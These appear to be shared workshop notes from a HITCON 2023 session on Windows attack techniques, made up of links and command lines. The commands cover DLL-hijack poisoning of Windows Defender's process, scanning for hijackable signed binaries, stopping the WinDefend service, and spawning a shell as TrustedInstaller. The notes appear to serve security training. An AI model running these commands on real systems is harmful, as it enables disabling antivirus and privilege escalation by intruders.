共筆 @ https://hackmd.io/@XHFUQdfkR4unNiIFF3-kjA/hitcon23 https://blog.xpnsec.com/wam-bam/ Slide: [Google Drive](https://drive.google.com/file/d/1GrPGYzlTCf2dyMpZYp8MXz0pNwo9tUoO/view?usp=sharing) ### ``` set PATH=%PATH%; C:\radare2-5.7.4-w64\bin python offsetExtract.py -i C:\Windows\System32\ntoskrnl.exe ``` https://github.com/aaaddress1/PR0CESS/tree/main/HideMyAss ### KnownDlls Poison ``` VERSION.dll C:\Users\exploit\Desktop\EventAggregation_Payload.dll "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MsMpEng.exe" ``` https://github.com/itm4n/PPLdump/tree/master ### Msvcr100 - 可轉發套件 https://www.microsoft.com/zh-tw/download/details.aspx?id=26999 https://posts.specterops.io/understanding-and-defending-against-access-token-theft-finding-alternatives-to-winlogon-exe-80696c8a73b https://blog.xpnsec.com/becoming-system/ ### `Siofra64.exe --mode file-scan -f C:\Windows\System32\ -r --signed --auto-elevate --enum-dependency --dll-hijack` ``` C:\toolchain\Forshaw\TokenViewer.exe sc stop WinDefend C:\toolchain\Tokenvator.exe GetTrustedInstaller /Command:cmd.exe ```